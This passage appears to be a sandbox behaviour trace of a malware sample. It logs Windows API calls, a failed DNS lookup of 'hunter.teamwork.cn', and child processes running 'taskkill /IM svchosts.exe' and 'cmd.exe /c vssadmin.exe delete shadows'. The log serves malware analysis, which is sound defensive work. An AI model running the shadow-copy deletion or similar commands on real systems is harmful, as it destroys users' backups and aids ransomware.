sin_addr="192.168.0.1"), namelen=16) returned 0 [0185.779] send (s=0x194, buf=0x2d0fcd8*, len=42, flags=0) returned 42 [0185.787] select (in: nfds=404, readfds=0x2cff8d8, writefds=0x0, exceptfds=0x0, timeout=0x2cff8a4*(tv_sec=2, tv_usec=0) | out: readfds=0x2cff8d8, writefds=0x0, exceptfds=0x0) returned 1 [0185.787] recv (in: s=0x194, buf=0x2cffc98, len=65536, flags=0 | out: buf=0x2cffc98*) returned 42 [0185.787] closesocket (s=0x194) returned 0 [0185.788] RtlIpv4AddressToStringExA () returned 0xc000000d [0185.793] DnsFreeConfigStructure () returned 0x1 [0185.796] malloc (_Size=0xc) returned 0x3041090 [0185.796] strcpy_s (in: _Dst=0x3041090, _DstSize=0xc, _Src="UnKnown" | out: _Dst="UnKnown") returned 0x0 [0185.796] LocalAlloc (uFlags=0x40, uBytes=0x60) returned 0x321b2c0 [0185.796] strcpy_s (in: _Dst=0x9a2200, _DstSize=0x100, _Src="UnKnown" | out: _Dst="UnKnown") returned 0x0 [0185.797] __iob_func () returned 0x74ff2608 [0185.797] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x35, dwLanguageId=0x0, lpBuffer=0x2d1fba0, nSize=0x0, Arguments=0x2d1fba4 | out: lpBuffer="\x18r!\x03´ûÑ\x02ÄûÑ\x02ö±\x99") returned 0x7 [0185.956] fprintf (in: _File=0x74ff2628, _Format="%-7s %s" | out: _File=0x74ff2628) returned 16 [0185.957] fprintf (in: _File=0x74ff2628, _Format="\nAddress:" | out: _File=0x74ff2628) returned 9 [0185.957] inet_ntoa (in=0x100a8c0) returned="192.168.0.1" [0185.957] fprintf (in: _File=0x74ff2628, _Format="%c %s" | out: _File=0x74ff2628) returned 13 [0185.957] fprintf (in: _File=0x74ff2628, _Format="\n\n" | out: _File=0x74ff2628) returned 2 [0185.958] RtlIpv4StringToAddressA () returned 0xc000000d [0185.958] RtlIpv6StringToAddressExA (AddressString="hunter.teamwork.cn", Address=0x2d1fb80, ScopeId=0x2d1fb90, Port=0x2d1fb7a) returned 0xc000000d [0185.958] RtlRestoreLastWin32Error () returned 0x2e88000 [0185.958] RtlIpv4StringToAddressA () returned 0xc000000d [0185.958] RtlIpv6StringToAddressExA (AddressString="hunter.teamwork.cn", Address=0x2d1fb08, ScopeId=0x2d1fb18, Port=0x2d1fb02) returned 0xc000000d [0185.958] RtlRestoreLastWin32Error () returned 0x2e88000 [0185.958] sprintf_s (in: _DstBuf=0x2d1f870, _DstSize=0x202, _Format="%s.%s" | out: _DstBuf="hunter.teamwork.cn.") returned 19 [0185.958] htons (hostshort=0x2) returned 0x200 [0185.958] htons (hostshort=0x1) returned 0x100 [0185.958] socket (af=2, type=2, protocol=0) returned 0x1dc [0185.959] connect (s=0x1dc, name=0x321b2e0*(sa_family=2, sin_port=0x35, sin_addr="192.168.0.1"), namelen=16) returned 0 [0185.960] send (s=0x1dc, buf=0x2d0f870*, len=36, flags=0) returned 36 [0185.961] select (in: nfds=476, readfds=0x2cff470, writefds=0x0, exceptfds=0x0, timeout=0x2cff43c*(tv_sec=2, tv_usec=0) | out: readfds=0x2cff470, writefds=0x0, exceptfds=0x0) returned 1 [0185.961] recv (in: s=0x1dc, buf=0x2cff830, len=65536, flags=0 | out: buf=0x2cff830*) returned 36 [0185.961] closesocket (s=0x1dc) returned 0 [0185.962] sprintf_s (in: _DstBuf=0x2d1f870, _DstSize=0x202, _Format="%s.%s" | out: _DstBuf="hunter.teamwork.cn.") returned 19 [0185.962] htons (hostshort=0x3) returned 0x300 [0185.962] htons (hostshort=0x1) returned 0x100 [0185.962] socket (af=2, type=2, protocol=0) returned 0x1dc [0185.962] connect (s=0x1dc, name=0x321b2e0*(sa_family=2, sin_port=0x35, sin_addr="192.168.0.1"), namelen=16) returned 0 [0185.963] send (s=0x1dc, buf=0x2d0f870*, len=36, flags=0) returned 36 [0185.964] select (in: nfds=476, readfds=0x2cff470, writefds=0x0, exceptfds=0x0, timeout=0x2cff43c*(tv_sec=2, tv_usec=0) | out: readfds=0x2cff470, writefds=0x0, exceptfds=0x0) returned 1 [0185.964] recv (in: s=0x1dc, buf=0x2cff830, len=65536, flags=0 | out: buf=0x2cff830*) returned 36 [0185.964] closesocket (s=0x1dc) returned 0 [0185.965] htons (hostshort=0x4) returned 0x400 [0185.965] htons (hostshort=0x1) returned 0x100 [0185.965] socket (af=2, type=2, protocol=0) returned 0x1dc [0185.965] connect (s=0x1dc, name=0x321b2e0*(sa_family=2, sin_port=0x35, sin_addr="192.168.0.1"), namelen=16) returned 0 [0185.966] send (s=0x1dc, buf=0x2d0f870*, len=36, flags=0) returned 36 [0185.967] select (in: nfds=476, readfds=0x2cff470, writefds=0x0, exceptfds=0x0, timeout=0x2cff43c*(tv_sec=2, tv_usec=0) | out: readfds=0x2cff470, writefds=0x0, exceptfds=0x0) returned 1 [0185.967] recv (in: s=0x1dc, buf=0x2cff830, len=65536, flags=0 | out: buf=0x2cff830*) returned 36 [0185.967] closesocket (s=0x1dc) returned 0 [0185.967] htons (hostshort=0x5) returned 0x500 [0185.967] htons (hostshort=0x1) returned 0x100 [0185.967] socket (af=2, type=2, protocol=0) returned 0x1dc [0185.968] connect (s=0x1dc, name=0x321b2e0*(sa_family=2, sin_port=0x35, sin_addr="192.168.0.1"), namelen=16) returned 0 [0185.968] send (s=0x1dc, buf=0x2d0f870*, len=36, flags=0) returned 36 [0185.970] select (in: nfds=476, readfds=0x2cff470, writefds=0x0, exceptfds=0x0, timeout=0x2cff43c*(tv_sec=2, tv_usec=0) | out: readfds=0x2cff470, writefds=0x0, exceptfds=0x0) returned 1 [0185.970] recv (in: s=0x1dc, buf=0x2cff830, len=65536, flags=0 | out: buf=0x2cff830*) returned 36 [0185.970] closesocket (s=0x1dc) returned 0 [0185.970] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x34, dwLanguageId=0x400, lpBuffer=0x2d1fb48, nSize=0x0, Arguments=0x2d1fb44 | out: lpBuffer="Pª!\x03ÄûÑ\x02<\x90\x99") returned 0x40 [0185.971] ApiSetQueryApiSetPresence () returned 0x0 [0185.971] ResolveDelayLoadedAPI () returned 0x73a626e0 [0186.512] CharToOemBuffA (in: lpszSrc="*** UnKnown can't find hunter.teamwork.cn: Non-existent domain\r\n", lpszDst=0x321aa50, cchDstLength=0x40 | out: lpszDst="*** UnKnown can't find hunter.teamwork.cn: Non-existent domain\r\n") returned 1 [0186.512] _write (in: _FileHandle=2, _Buf=0x321aa50*, _MaxCharCount=0x40 | out: _Buf=0x321aa50*) returned 64 [0186.513] LocalFree (hMem=0x321aa50) returned 0x0 [0186.513] free (_Block=0x3041090) [0186.513] LocalFree (hMem=0x321b2c0) returned 0x0 [0186.513] free (_Block=0x3040da8) [0186.513] exit (_Code=0) Thread: id = 26 os_tid = 0xc08 Thread: id = 33 os_tid = 0xf0 Process: id = "3" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x14157000" os_pid = "0x135c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1224" cmd_line = "\"taskkill.exe\" /IM svchosts.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0x129c Thread: id = 24 os_tid = 0xd44 Thread: id = 27 os_tid = 0xc84 Thread: id = 28 os_tid = 0xcb4 Thread: id = 34 os_tid = 0xc70 Thread: id = 36 os_tid = 0x448 Thread: id = 37 os_tid = 0xef0 Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x19160000" os_pid = "0x1280" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1224" cmd_line = "\"cmd.exe\" /c vssadmin.exe delete shadows" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0x109c [0176.998] GetModuleHandleA (lpModuleName=0x0) returned 0xed0000 [0176.998] __set_app_type (_Type=0x1) [0176.998] __p__fmode () returned 0x74ff3c14 [0176.998] __p__commode () returned 0x74ff49ec [0176.999] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xee6fd0) returned 0x0 [0178.218] __getmainargs (in: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac, _DoWildCard=0, _StartInfo=0xefd1b8 | out: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac) returned 0 [0178.219] _onexit (_Func=0xee8030) returned 0xee8030 [0178.219] _onexit (_Func=0xee8040) returned 0xee8040 [0178.219] _onexit (_Func=0xee8050) returned 0xee8050 [0178.220] _onexit (_Func=0xee8060) returned 0xee8060 [0178.220] _onexit (_Func=0xee8070) returned 0xee8070 [0178.253] _onexit (_Func=0xee8080) returned 0xee8080 [0178.253] GetCurrentThreadId () returned 0x109c [0178.253] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x109c) returned 0xb4 [0178.254] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0178.254] GetProcAddress (hModule=0x73b80000, lpProcName="SetThreadUILanguage") returned 0x73b94f70 [0178.254] SetThreadUILanguage (LangId=0x0) returned 0x3170409 [0179.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0179.517] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32ff8dc | out: phkResult=0x32ff8dc*=0x0) returned 0x2 [0179.518] VirtualQuery (in: lpAddress=0x32ff8e7, lpBuffer=0x32ff894, dwLength=0x1c | out: lpBuffer=0x32ff894*(BaseAddress=0x32ff000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0179.519] VirtualQuery (in: lpAddress=0x3200000, lpBuffer=0x32ff894, dwLength=0x1c | out: lpBuffer=0x32ff894*(BaseAddress=0x3200000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0179.519] VirtualQuery (in: lpAddress=0x3201000, lpBuffer=0x32ff894, dwLength=0x1c | out: lpBuffer=0x32ff894*(BaseAddress=0x3201000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0179.519] VirtualQuery (in: lpAddress=0x3203000, lpBuffer=0x32ff894, dwLength=0x1c | out: lpBuffer=0x32ff894*(BaseAddress=0x3203000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0179.519] VirtualQuery (in: lpAddress=0x3300000, lpBuffer=0x32ff894, dwLength=0x1c | out: lpBuffer=0x32ff894*(BaseAddress=0x3300000, AllocationBase=0x3300000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0179.519] GetConsoleOutputCP () returned 0x1b5 [0180.509] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0180.510] SetConsoleCtrlHandler (HandlerRoutine=0xef7260, Add=1) returned 1 [0180.510] _get_osfhandle (_FileHandle=1) returned 0x3a0 [0180.510] GetConsoleMode (in: hConsoleHandle=0x3a0, lpMode=0xf0388c | out: lpMode=0xf0388c) returned 0 [0180.511] _get_osfhandle (_FileHandle=0) returned 0x8c [0180.511] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03888 | out: lpMode=0xf03888) returned 1 [0181.403] _get_osfhandle (_FileHandle=1) returned 0x3a0 [0181.404] SetConsoleMode (hConsoleHandle=0x3a0, dwMode=0x0) returned 0 [0181.404] _get_osfhandle (_FileHandle=1) returned 0x3a0 [0181.404] GetConsoleMode (in: hConsoleHandle=0x3a0, lpMode=0xf03890 | out: lpMode=0xf03890) returned 0 [0181.404] _get_osfhandle (_FileHandle=0) returned 0x8c [0181.404] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03894 | out: lpMode=0xf03894) returned 1 [0182.284] _get_osfhandle (_FileHandle=0) returned 0x8c [0182.301] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0183.216] GetEnvironmentStringsW () returned 0x3334bd8* [0183.249] GetProcessHeap () returned 0x3330000 [0183.249] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xaca) returned 0x33356b0 [0183.295] FreeEnvironmentStringsA (penv="A") returned 1 [0183.295] GetProcessHeap () returned 0x3330000 [0183.295] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x4) returned 0x3334700 [0183.295] GetEnvironmentStringsW () returned 0x3334bd8* [0183.295] GetProcessHeap () returned 0x3330000 [0183.295] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xaca) returned 0x3336188 [0183.296] FreeEnvironmentStringsA (penv="A") returned 1 [0183.296] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32fe838 | out: phkResult=0x32fe838*=0xc4) returned 0x0 [0183.296] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x0, lpData=0x32fe844*=0xc8, lpcbData=0x32fe83c*=0x1000) returned 0x2 [0183.296] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x1, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.296] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x0, lpData=0x32fe844*=0x1, lpcbData=0x32fe83c*=0x1000) returned 0x2 [0183.296] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x0, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.296] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x40, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.297] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x40, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.297] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x0, lpData=0x32fe844*=0x40, lpcbData=0x32fe83c*=0x1000) returned 0x2 [0183.297] RegCloseKey (hKey=0xc4) returned 0x0 [0183.297] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32fe838 | out: phkResult=0x32fe838*=0xc4) returned 0x0 [0183.297] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x0, lpData=0x32fe844*=0x40, lpcbData=0x32fe83c*=0x1000) returned 0x2 [0183.298] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x1, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.298] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x0, lpData=0x32fe844*=0x1, lpcbData=0x32fe83c*=0x1000) returned 0x2 [0183.298] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x0, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.298] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x9, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.298] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x4, lpData=0x32fe844*=0x9, lpcbData=0x32fe83c*=0x4) returned 0x0 [0183.298] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32fe840, lpData=0x32fe844, lpcbData=0x32fe83c*=0x1000 | out: lpType=0x32fe840*=0x0, lpData=0x32fe844*=0x9, lpcbData=0x32fe83c*=0x1000) returned 0x2 [0183.298] RegCloseKey (hKey=0xc4) returned 0x0 [0183.298] time (in: timer=0x0 | out: timer=0x0) returned 0x5e578f62 [0183.299] srand (_Seed=0x5e578f62) [0183.299] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows" [0183.299] malloc (_Size=0x4000) returned 0x38121f0 [0183.300] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows" [0183.301] malloc (_Size=0xffce) returned 0x3660048 [0183.302] ??_V@YAXPAX@Z () returned 0x32ff81c [0183.304] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3660048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0183.307] malloc (_Size=0xffce) returned 0x3670020 [0183.308] ??_V@YAXPAX@Z () returned 0x32ff5f0 [0183.310] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3670020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0183.310] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0183.310] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.310] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.310] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0183.310] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0183.310] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0183.311] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0183.311] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0183.311] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0183.311] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0183.311] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0183.311] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0183.312] GetProcessHeap () returned 0x3330000 [0183.312] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x33356b0) returned 1 [0183.312] GetEnvironmentStringsW () returned 0x3334bd8* [0183.312] GetProcessHeap () returned 0x3330000 [0183.312] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xae2) returned 0x3337750 [0183.312] FreeEnvironmentStringsA (penv="A") returned 1 [0183.312] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0183.312] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.313] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0183.313] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0183.313] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0183.313] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0183.313] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0183.313] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0183.313] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0183.313] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0183.313] malloc (_Size=0xffce) returned 0x367fff8 [0183.314] ??_V@YAXPAX@Z () returned 0x32ff388 [0183.315] GetProcessHeap () returned 0x3330000 [0183.315] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x38) returned 0x3334870 [0183.315] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x367fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0183.316] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x367fff8, lpFilePart=0x32ff3d4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x32ff3d4*="Desktop") returned 0x17 [0183.317] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0183.318] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32ff158 | out: lpFindFileData=0x32ff158*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3330ae0 [0183.318] FindClose (in: hFindFile=0x3330ae0 | out: hFindFile=0x3330ae0) returned 1 [0183.318] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x32ff158 | out: lpFindFileData=0x32ff158*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x3330ae0 [0183.319] FindClose (in: hFindFile=0x3330ae0 | out: hFindFile=0x3330ae0) returned 1 [0183.319] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x32ff158 | out: lpFindFileData=0x32ff158*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x60904d03, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3330ae0 [0183.319] FindClose (in: hFindFile=0x3330ae0 | out: hFindFile=0x3330ae0) returned 1 [0183.319] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0183.320] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0183.320] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0183.320] GetProcessHeap () returned 0x3330000 [0183.320] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3337750) returned 1 [0183.320] GetEnvironmentStringsW () returned 0x3334bd8* [0183.321] GetProcessHeap () returned 0x3330000 [0183.321] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xb1a) returned 0x3336c60 [0183.321] FreeEnvironmentStringsA (penv="=") returned 1 [0183.321] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3660048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0183.321] GetProcessHeap () returned 0x3330000 [0183.321] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3334870) returned 1 [0183.321] ??_V@YAXPAX@Z () returned 0x1 [0183.321] ??_V@YAXPAX@Z () returned 0x1 [0183.321] GetProcessHeap () returned 0x3330000 [0183.321] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x400e) returned 0x3338d68 [0183.322] GetProcessHeap () returned 0x3330000 [0183.323] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x44) returned 0x3334870 [0183.323] GetProcessHeap () returned 0x3330000 [0183.323] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3338d68) returned 1 [0183.323] GetConsoleOutputCP () returned 0x1b5 [0184.149] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0184.149] GetUserDefaultLCID () returned 0x409 [0184.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xeff82c, cchData=8 | out: lpLCData=":") returned 2 [0184.151] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32ff744, cchData=128 | out: lpLCData="0") returned 2 [0184.151] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32ff744, cchData=128 | out: lpLCData="0") returned 2 [0184.151] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32ff744, cchData=128 | out: lpLCData="1") returned 2 [0184.151] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xeff81c, cchData=8 | out: lpLCData="/") returned 2 [0184.151] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xeff7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0184.151] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xeff778, cchData=32 | out: lpLCData="Tue") returned 4 [0184.152] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xeff738, cchData=32 | out: lpLCData="Wed") returned 4 [0184.152] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xeff6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0184.152] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xeff6b8, cchData=32 | out: 